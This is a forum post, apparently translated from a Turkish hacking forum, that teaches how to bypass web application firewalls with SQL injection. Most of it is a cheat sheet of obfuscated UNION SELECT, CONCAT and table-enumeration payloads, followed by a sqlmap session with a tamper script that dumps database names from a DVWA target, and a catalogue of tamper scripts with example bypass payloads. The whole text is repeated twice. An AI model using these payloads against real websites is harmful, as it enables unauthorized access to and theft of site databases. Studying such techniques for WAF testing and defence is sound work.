Kullanıcı1233
Kıdemli Üye
- 19 Tem 2011
- 4,371
- 12
WAF stands for Web Application Firewall.
If you wanna penetrate into system of a website, you have to look for it's some vulnerabilities in the web applications.
So, what are the types of these vulnerabilities?
- SQL Injection
- XSS(Cross Site Script)
- LFI/RFI-(Local File Include)/(Remote File Include)
- Command Injection
- Code Execution and Other Applications
But these vulnerabilities can be blocked, sometimes we just have to bypass it.
UNION SELECT BYPASS METHODS
+--+Union+--+Select+--+
+#uNiOn+#sEleCt+
+union+distinct+select+
+union+distinctROW+select+
+union%23aa%0Aselect+
0%a0union%a0select%09
%0Aunion%0Aselect%0A
+UnIoN+SeLselectECT+
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f%2a*/UNION%2f%2a*/SELECT%2f%2a*/
+%2F**%2Funion%2F**%2Fselect+
+UnIoN/*&a=*/SeLeCT/*&a=*/
+%0A%0D/*!%0A%0Dunion*/+%0A%0D/*!50000Select*/%0A%0D
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
CONCAT BYPASS METHODS
group_concat()
grOUp_ConCat(/*!*/,0x3e,/*!*/)
group_concat(,0x3c62723e)
g%72oup_c%6Fncat%28%76%65rsion%28%29,%22B3yaz%22%2 9
g%72oup_c%6Fncat%28%76%65rsion%28%29%2C%22B3yaz%22 %29
group_concat%28version%28%29%2C%22B3yaz%22%29
CoNcAt()
concat()
CoNcAt()
CONCAT(DISTINCT )
concat(0x3a,,0x3c62723e)
/*!50000cOnCat*/
concat_ws()
concat_ws(0x3a,)
CONCAT_WS(CHAR(32,58,32),version(),)
REVERSE(tacnoc)
binary(version())
uncompress(compress(version()))
aes_decrypt(aes_encrypt(version(),1),1)
LIMIT BYPASS METHODS
+LIMIT+0,1
+where+id+=1
WHERE ID_Produit='26 -- -
+having+id+=1
+and length((select password from users having substr(pass,1,1)=a'))
[4] Null Parameter
id=-1
id=null
id=1+and+false+
id=9999
id=1 and 0
id==1
id=(-1)
=1=1
+And+1=0
/*!and*/+1=0
COLUMN BYPASS METHODS
Having+1=1
+and=0+
+div+0+
replace ' = %23
where 1=1
TABLE BYPASS METHOD
(/*!50000%53elect*/%0A/*!50000%54able_name*/%0A%0A/*!50000%46roM*/%0A/*!50000%49nfORmaTion_%53cHema . %54AblES*/%0A/*!50000%57here*/%0A%54able_ScHEmA=schEMA()%0Alimit%0A0,1)
HEX/UNHEX BYPASS METHODS
unhex(hex(value))
convert(database() using latin1)
cast(value as char)
uncompress(compress(version()))
cast(value as char)
aes_decrypt(aes_encrypt(value,1),1)
binary(value)
convert()
You can try to get error alert by typing the proper one right after URL.
Or, we can use the "Tamper Script" feature of SQLMap.
If i need to demonstrate:
In the following part, SQLMap's default usage parameters had given into the system which uses WAF and couldn't get result. But couldn't get result.
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://1.2.3.4/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=de9fd298875093226427e5475c47b5eb" --tamper "tamper/randomcase.py" --dbs
[*] starting at 16:16:24
[16:16:24] [INFO] loading tamper script 'randomcase'
[16:16:24] [INFO] testing connection to the target url
[16:16:25] [INFO] testing if the url is stable, wait a few seconds
[16:16:26] [INFO] url is stable
[16:16:26] [INFO] testing if GET parameter 'id' is dynamic
[16:16:26] [WARNING] GET parameter 'id' appears to be not dynamic
[16:16:26] [INFO] heuristics detected web page charset 'ascii'
[16:16:26] [WARNING] reflective value(s) found and filtering out
[16:16:26] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[16:16:26] [INFO] testing for SQL injection on GET parameter 'id'
[16:16:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:16:26] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string='Surname: admin')
[16:16:26] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[16:16:26] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[16:16:26] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[16:16:26] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[16:16:27] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[16:16:37] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[16:16:37] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[16:16:37] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
[16:16:37] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[16:16:37] [INFO] target url appears to have 2 columns in query
[16:16:37] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 19 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 3106=3106&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1 AND (SELECT 2385 FROM(SELECT COUNT(*),CONCAT(0x3a72796b3a,(SELECT (CASE WHEN (2385=2385) THEN 1 ELSE 0 END)),0x3a6b6e693a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=1 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a72796b3a,0x4f676a51626745675562,0x3a6b6e693a), NULL#&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)&Submit=Submit
---
[16:16:41] [INFO] changes made by tampering scripts are not included in shown payload content(s)
[16:16:41] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.8
back-end DBMS: MySQL 5.0
[16:16:41] [INFO] fetching database names
available databases [7]:[*] beyazsapka[*] dvwa[*] information_schema[*] mysql[*] phpmyadmin[*] test[*] yenibir_siparis
[16:16:41] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.1.127'[*] shutting down at 16:16:41
As you can see, protective mechanism in targeted system has been bypassed.
In the SQLMap's directory, there are several bypass scripts in "tamper" folder. In the above test, we used "randomcase.py" script that located in "tamper" folder. This script sends sql commands like UNION by editing it random upper lower cases to the targeted system. That means WAF is bypassed anymore.
And let's listing other bypass scripts' names, bypass methods and platforms.
apostrophemask.py (UTF-8)
Example:
* Original Command: AND '1'='1'
* Bypass Command: AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87
apostrophenullencode.py (unicode)
Example:
* Original Command: AND '1'='1'
* Bypass Command: AND %271%27=%271%27
appendnullbyte.py ()
Example:
* Original Command: AND 1=1
* Bypass Command: AND 1=1
Platform:
* Microsoft Access
base64encode.py (base64)
Example:
* Original Command: 1' AND SLEEP(5)#
* Bypass Command: MScgQU5EIFNMRUVQKDUpIw==
between.py (not between >)
Example:
* Original Command: 'A > B'
* Bypass Command: 'A NOT BETWEEN 0 AND B'
bluecoat.py (like =)
Example:
* Original Command: SELECT id FROM users where id = 1
* Bypass Command: SELECT%09id FROM users where id LIKE 1
Platform:
* MySQL 5.1, SGOS
chardoubleencode.py
Example:
* Original Command: SELECT FIELD FROM%20TABLE
* Bypass Command: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545 %254c%2544%2520%2546%2552%254f%254d%2520%2554%2541 %2542%254c%2545
charencode.py
Example:
* Original Command: SELECT FIELD FROM%20TABLE
* Bypass Command: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4 d%20%54%41%42%4c%45
charunicodeencode.py
Example:
* Original Command: SELECT FIELD%20FROM TABLE
* Bypass Command: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u 0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u00 4d%u0020%u0054%u0041%u0042%u004c%u0045'
Platform:
* ASP
* ASP.NET
equaltolike.py (like =)
Example:
* Original Command: SELECT * FROM users WHERE id=1
* Bypass Command: SELECT * FROM users WHERE id LIKE 1
halfversionedmorekeywords.py
Example:
* Original Command: value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT _USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa
* Bypass Command: value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa
Platform:
* MySQL < 5.1
ifnull2ifisnull.py (IF(ISNULL(A), B, A) IFNULL(A, B))
Example:
* Original Command: IFNULL(1, 2)
* Bypass Command: IF(ISNULL(1), 2, 1)
Platform:
* MySQL
* SQLite (possibly)
* SAP MaxDB (possibly)
modsecurityversioned.py
Example:
* Original Command: 1 AND 2>1--
* Bypass Command: 1 /*!30000AND 2>1*/--
Platform:
* MySQL
modsecurityzeroversioned.py (0000)
Example:
* Original Command: 1 AND 2>1--
* Bypass Command: 1 /*!00000AND 2>1*/--
Platform:
* MySQL
multiplespaces.py
Example:
* Original Command: UNION SELECT
* Bypass Command: UNION SELECT
nonrecursivereplacement.py
Example:
* Original Command: 1 UNION SELECT 2--
* Bypass Command: 1 UNUNIONION SELSELECTECT 2--
percentage.py (%)
Example:
* Original Command: SELECT FIELD FROM TABLE
* Bypass Command: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
Platform:
* ASP
randomcase.py
Example:
* Original Command: INSERT
* Bypass Command: InsERt
randomcomments.py
Example:
'INSERT' becomes 'IN/**/S/**/ERT'
securesphere.py
Example:
* Original Command: AND 1=1
* Bypass Command: AND 1=1 and '0having'='0having'
sp_password.py (sp_password)
Example:
* Original Command: 1 AND 9227=9227--
* Bypass Command: 1 AND 9227=9227--sp_password
Platform:
* MSSQL
space2comment.py
Example:
* Original Command: SELECT id FROM users
* Bypass Command: SELECT/**/id/**/FROM/**/users
space2dash.py (--)
Example:
* Original Command: 1 AND 9227=9227
* Bypass Command: 1--PTTmJopxdWJ%0AAND--cWfcVRPV%0A9227=9227
Platform:
* MSSQL
* SQLite
space2hash.py
Example:
* Original Command: 1 AND 9227=9227
* Bypass Command: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
Platform:
* MySQL
space2morehash.py
Platform:
* MySQL >= 5.1.13
space2mssqlblank.py
Example:
* Original Command: SELECT id FROM users
* Bypass Command: SELECT%08id%02FROM%0Fusers
Platform:
* Microsoft SQL Server
space2mssqlhash.py
Example:
* Original Command: 1 AND 9227=9227
* Bypass Command: 1%23%0A9227=9227
Platform:
* MSSQL
* MySQL
space2mysqlblank.py
Example:
* Original Command: SELECT id FROM users
* Bypass Command: SELECT%0Bid%0BFROM%A0users
Platform:
* MySQL
space2mysqldash.py
Example:
* Original Command: 1 AND 9227=9227
* Bypass Command: 1--%0AAND--%0A9227=9227
Platform:
* MySQL
* MSSQL
space2plus.py (+)
Example:
* Original Command: SELECT id FROM users
* Bypass Command: SELECT+id+FROM+users
space2randomblank.py
Example:
* Original Command: SELECT id FROM users
* Bypass Command: SELECTridtFROMnusers
unionalltounion.py (union all union)
Example:
* Original Command: -1 UNION ALL SELECT
* Bypass Command: -1 UNION SELECT
unmagicquotes.py (%bf%27 --)
Example:
* Original Command: 1' AND 1=1
* Bypass Command: 1%bf%27 AND 1=1--%20
versionedkeywords.py
Example:
* Original Command: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT _USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#
* Bypass Command: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURREN T_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#
Platform:
* MySQL
versionedmorekeywords.py
Example:
* Original Command: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT _USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
* Bypass Command: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#
Platform:
* MySQL >= 5.1.13
If you wanna penetrate into system of a website, you have to look for it's some vulnerabilities in the web applications.
So, what are the types of these vulnerabilities?
- SQL Injection
- XSS(Cross Site Script)
- LFI/RFI-(Local File Include)/(Remote File Include)
- Command Injection
- Code Execution and Other Applications
But these vulnerabilities can be blocked, sometimes we just have to bypass it.
UNION SELECT BYPASS METHODS
+--+Union+--+Select+--+
+#uNiOn+#sEleCt+
+union+distinct+select+
+union+distinctROW+select+
+union%23aa%0Aselect+
0%a0union%a0select%09
%0Aunion%0Aselect%0A
+UnIoN+SeLselectECT+
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f%2a*/UNION%2f%2a*/SELECT%2f%2a*/
+%2F**%2Funion%2F**%2Fselect+
+UnIoN/*&a=*/SeLeCT/*&a=*/
+%0A%0D/*!%0A%0Dunion*/+%0A%0D/*!50000Select*/%0A%0D
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
CONCAT BYPASS METHODS
group_concat()
grOUp_ConCat(/*!*/,0x3e,/*!*/)
group_concat(,0x3c62723e)
g%72oup_c%6Fncat%28%76%65rsion%28%29,%22B3yaz%22%2 9
g%72oup_c%6Fncat%28%76%65rsion%28%29%2C%22B3yaz%22 %29
group_concat%28version%28%29%2C%22B3yaz%22%29
CoNcAt()
concat()
CoNcAt()
CONCAT(DISTINCT )
concat(0x3a,,0x3c62723e)
/*!50000cOnCat*/
concat_ws()
concat_ws(0x3a,)
CONCAT_WS(CHAR(32,58,32),version(),)
REVERSE(tacnoc)
binary(version())
uncompress(compress(version()))
aes_decrypt(aes_encrypt(version(),1),1)
LIMIT BYPASS METHODS
+LIMIT+0,1
+where+id+=1
WHERE ID_Produit='26 -- -
+having+id+=1
+and length((select password from users having substr(pass,1,1)=a'))
[4] Null Parameter
id=-1
id=null
id=1+and+false+
id=9999
id=1 and 0
id==1
id=(-1)
=1=1
+And+1=0
/*!and*/+1=0
COLUMN BYPASS METHODS
Having+1=1
+and=0+
+div+0+
replace ' = %23
where 1=1
TABLE BYPASS METHOD
(/*!50000%53elect*/%0A/*!50000%54able_name*/%0A%0A/*!50000%46roM*/%0A/*!50000%49nfORmaTion_%53cHema . %54AblES*/%0A/*!50000%57here*/%0A%54able_ScHEmA=schEMA()%0Alimit%0A0,1)
HEX/UNHEX BYPASS METHODS
unhex(hex(value))
convert(database() using latin1)
cast(value as char)
uncompress(compress(version()))
cast(value as char)
aes_decrypt(aes_encrypt(value,1),1)
binary(value)
convert()
You can try to get error alert by typing the proper one right after URL.
Or, we can use the "Tamper Script" feature of SQLMap.
If i need to demonstrate:
In the following part, SQLMap's default usage parameters had given into the system which uses WAF and couldn't get result. But couldn't get result.
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://1.2.3.4/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=de9fd298875093226427e5475c47b5eb" --tamper "tamper/randomcase.py" --dbs
[*] starting at 16:16:24
[16:16:24] [INFO] loading tamper script 'randomcase'
[16:16:24] [INFO] testing connection to the target url
[16:16:25] [INFO] testing if the url is stable, wait a few seconds
[16:16:26] [INFO] url is stable
[16:16:26] [INFO] testing if GET parameter 'id' is dynamic
[16:16:26] [WARNING] GET parameter 'id' appears to be not dynamic
[16:16:26] [INFO] heuristics detected web page charset 'ascii'
[16:16:26] [WARNING] reflective value(s) found and filtering out
[16:16:26] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[16:16:26] [INFO] testing for SQL injection on GET parameter 'id'
[16:16:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:16:26] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string='Surname: admin')
[16:16:26] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[16:16:26] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[16:16:26] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[16:16:26] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[16:16:27] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[16:16:37] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[16:16:37] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[16:16:37] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
[16:16:37] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[16:16:37] [INFO] target url appears to have 2 columns in query
[16:16:37] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 19 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 3106=3106&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1 AND (SELECT 2385 FROM(SELECT COUNT(*),CONCAT(0x3a72796b3a,(SELECT (CASE WHEN (2385=2385) THEN 1 ELSE 0 END)),0x3a6b6e693a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=1 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a72796b3a,0x4f676a51626745675562,0x3a6b6e693a), NULL#&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)&Submit=Submit
---
[16:16:41] [INFO] changes made by tampering scripts are not included in shown payload content(s)
[16:16:41] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.8
back-end DBMS: MySQL 5.0
[16:16:41] [INFO] fetching database names
available databases [7]:[*] beyazsapka[*] dvwa[*] information_schema[*] mysql[*] phpmyadmin[*] test[*] yenibir_siparis
[16:16:41] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.1.127'[*] shutting down at 16:16:41
As you can see, protective mechanism in targeted system has been bypassed.
In the SQLMap's directory, there are several bypass scripts in "tamper" folder. In the above test, we used "randomcase.py" script that located in "tamper" folder. This script sends sql commands like UNION by editing it random upper lower cases to the targeted system. That means WAF is bypassed anymore.
And let's listing other bypass scripts' names, bypass methods and platforms.
apostrophemask.py (UTF-8)
Example:
* Original Command: AND '1'='1'
* Bypass Command: AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87
apostrophenullencode.py (unicode)
Example:
* Original Command: AND '1'='1'
* Bypass Command: AND %271%27=%271%27
appendnullbyte.py ()
Example:
* Original Command: AND 1=1
* Bypass Command: AND 1=1
Platform:
* Microsoft Access
base64encode.py (base64)
Example:
* Original Command: 1' AND SLEEP(5)#
* Bypass Command: MScgQU5EIFNMRUVQKDUpIw==
between.py (not between >)
Example:
* Original Command: 'A > B'
* Bypass Command: 'A NOT BETWEEN 0 AND B'
bluecoat.py (like =)
Example:
* Original Command: SELECT id FROM users where id = 1
* Bypass Command: SELECT%09id FROM users where id LIKE 1
Platform:
* MySQL 5.1, SGOS
chardoubleencode.py
Example:
* Original Command: SELECT FIELD FROM%20TABLE
* Bypass Command: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545 %254c%2544%2520%2546%2552%254f%254d%2520%2554%2541 %2542%254c%2545
charencode.py
Example:
* Original Command: SELECT FIELD FROM%20TABLE
* Bypass Command: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4 d%20%54%41%42%4c%45
charunicodeencode.py
Example:
* Original Command: SELECT FIELD%20FROM TABLE
* Bypass Command: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u 0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u00 4d%u0020%u0054%u0041%u0042%u004c%u0045'
Platform:
* ASP
* ASP.NET
equaltolike.py (like =)
Example:
* Original Command: SELECT * FROM users WHERE id=1
* Bypass Command: SELECT * FROM users WHERE id LIKE 1
halfversionedmorekeywords.py
Example:
* Original Command: value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT _USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa
* Bypass Command: value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa
Platform:
* MySQL < 5.1
ifnull2ifisnull.py (IF(ISNULL(A), B, A) IFNULL(A, B))
Example:
* Original Command: IFNULL(1, 2)
* Bypass Command: IF(ISNULL(1), 2, 1)
Platform:
* MySQL
* SQLite (possibly)
* SAP MaxDB (possibly)
modsecurityversioned.py
Example:
* Original Command: 1 AND 2>1--
* Bypass Command: 1 /*!30000AND 2>1*/--
Platform:
* MySQL
modsecurityzeroversioned.py (0000)
Example:
* Original Command: 1 AND 2>1--
* Bypass Command: 1 /*!00000AND 2>1*/--
Platform:
* MySQL
multiplespaces.py
Example:
* Original Command: UNION SELECT
* Bypass Command: UNION SELECT
nonrecursivereplacement.py
Example:
* Original Command: 1 UNION SELECT 2--
* Bypass Command: 1 UNUNIONION SELSELECTECT 2--
percentage.py (%)
Example:
* Original Command: SELECT FIELD FROM TABLE
* Bypass Command: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
Platform:
* ASP
randomcase.py
Example:
* Original Command: INSERT
* Bypass Command: InsERt
randomcomments.py
Example:
'INSERT' becomes 'IN/**/S/**/ERT'
securesphere.py
Example:
* Original Command: AND 1=1
* Bypass Command: AND 1=1 and '0having'='0having'
sp_password.py (sp_password)
Example:
* Original Command: 1 AND 9227=9227--
* Bypass Command: 1 AND 9227=9227--sp_password
Platform:
* MSSQL
space2comment.py
Example:
* Original Command: SELECT id FROM users
* Bypass Command: SELECT/**/id/**/FROM/**/users
space2dash.py (--)
Example:
* Original Command: 1 AND 9227=9227
* Bypass Command: 1--PTTmJopxdWJ%0AAND--cWfcVRPV%0A9227=9227
Platform:
* MSSQL
* SQLite
space2hash.py
Example:
* Original Command: 1 AND 9227=9227
* Bypass Command: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
Platform:
* MySQL
space2morehash.py
Platform:
* MySQL >= 5.1.13
space2mssqlblank.py
Example:
* Original Command: SELECT id FROM users
* Bypass Command: SELECT%08id%02FROM%0Fusers
Platform:
* Microsoft SQL Server
space2mssqlhash.py
Example:
* Original Command: 1 AND 9227=9227
* Bypass Command: 1%23%0A9227=9227
Platform:
* MSSQL
* MySQL
space2mysqlblank.py
Example:
* Original Command: SELECT id FROM users
* Bypass Command: SELECT%0Bid%0BFROM%A0users
Platform:
* MySQL
space2mysqldash.py
Example:
* Original Command: 1 AND 9227=9227
* Bypass Command: 1--%0AAND--%0A9227=9227
Platform:
* MySQL
* MSSQL
space2plus.py (+)
Example:
* Original Command: SELECT id FROM users
* Bypass Command: SELECT+id+FROM+users
space2randomblank.py
Example:
* Original Command: SELECT id FROM users
* Bypass Command: SELECTridtFROMnusers
unionalltounion.py (union all union)
Example:
* Original Command: -1 UNION ALL SELECT
* Bypass Command: -1 UNION SELECT
unmagicquotes.py (%bf%27 --)
Example:
* Original Command: 1' AND 1=1
* Bypass Command: 1%bf%27 AND 1=1--%20
versionedkeywords.py
Example:
* Original Command: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT _USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#
* Bypass Command: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURREN T_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#
Platform:
* MySQL
versionedmorekeywords.py
Example:
* Original Command: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT _USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
* Bypass Command: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#
Platform:
* MySQL >= 5.1.13
Kod:
Original: https://www.turkhackteam.org/web-server-guvenligi/1177884-waf-nedir-waf-bypass-giris-gensu.html
Translator: R4V3N